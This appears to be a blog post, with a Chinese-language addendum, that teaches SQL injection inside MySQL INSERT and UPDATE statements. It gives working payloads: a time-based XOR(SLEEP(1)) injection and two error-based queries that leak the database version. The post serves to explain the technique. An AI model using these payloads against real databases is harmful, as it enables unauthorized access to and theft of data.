Heya! It’s been a long while since I wrote something here so I’d though I’d dust of the blogger keyboard and get some posts going. To start off I will cover the MySQL Injection in INSERT and UPDATE statements.What injection points in an INSERT query can we extract data from? In the previous INSERT post we covered the VALUES() injection point (INSERT INTO tbl_name (column_name) VALUES ([here]), ([and here])) but there are other ways to forge an INSERT statement.
INSERT INTO tbl_name SET column_name = '[here]'
INSERT INTO tbl_name (column_name1, column_name2) SELECT 'hello', '[here]'
The problem with the first case is that we don’t know the column names and the second one, we don’t know the column count. Since we don’t know the column names, we cant insert another “SET column_name = value” into the first statementso we will have to figure out a way to get around this. And for the second, we also have to figure out something we can insert without screwing up the query.
So what can we do?
We can add to the string value that already exists! But, what can we do with just a string value? Well. All bitwise operations (NOT, OR, XOR, AND) work, and no need for spaces ! Let’s merge an injection to work with the first scenario.
INSERT INTO tbl_name SET column_name = ''XOR(SLEEP(1))OR'' [...]
It works, and it returns 0 from the XOR operation! Now let’s try put that into the second query.
INSERT INTO tbl_name (column_name1, column_name2) SELECT 'hello', ''XOR(SLEEP(1))OR''
It also works! Splendid. What about UPDATE and SELECT statemens? Yup, it’s the same with those.I have written a neat Proof of Concept to this that searches GET (Yes I know, who the hell would insertsomething from a GET variable? But whatever!) variables and common Headers (Including referer anduser-agent) for these kinds of injections and here is the sourcecode!
我这里是数字型，所以后面 xor（）就不加 or 了，如果是字符型，就按国外黑客的那个语
句XOR(SLEEP(1))OR ，遇到 update 的时候也和 insert 方法一样。
and exists(select * from ( select * from (select name_const(version(),0) )a join (select name_const(version(),0) )b )c )
and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT version()))a from information_schema.tables group by a)b)
利用 xor /or 配合报错语句，从而做到像 select 一样注入，哈哈，相当爽吧！~